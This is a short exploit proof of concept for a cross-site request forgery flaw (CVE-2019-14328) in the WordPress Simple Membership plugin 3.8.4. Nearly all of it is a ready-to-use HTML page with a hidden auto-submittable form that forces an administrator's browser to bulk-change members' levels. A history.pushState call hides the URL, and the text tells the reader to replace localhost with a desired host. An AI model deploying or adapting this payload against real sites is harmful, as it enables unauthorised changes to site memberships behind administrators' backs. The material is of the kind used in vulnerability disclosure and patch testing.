# Exploit Title: Cross Site Request Forgery in Wordpress Simple Membership plugin
# Date: 2019-07-27
# Exploit Author: rubyman
# Vendor Homepage: https://wordpress.org/plugins/simple-membership/
# wpvulndb : https://wpvulndb.com/vulnerabilities/9482
# Version: 3.8.4
# Tested on: Windows 8.1
# CVE : CVE-2019-14328
#
# Change localhost to your desired host
#
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://localhost/wordpress/wp-admin/admin.php?page=simple_wp_membership&member_action=bulk" method="POST">
<input type="hidden" name="swpm_bulk_change_level_from" value="2" />
<input type="hidden" name="swpm_bulk_change_level_to" value="3" />
<input type="hidden" name="swpm_bulk_change_level_process" value="Bulk Change Membership Level" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>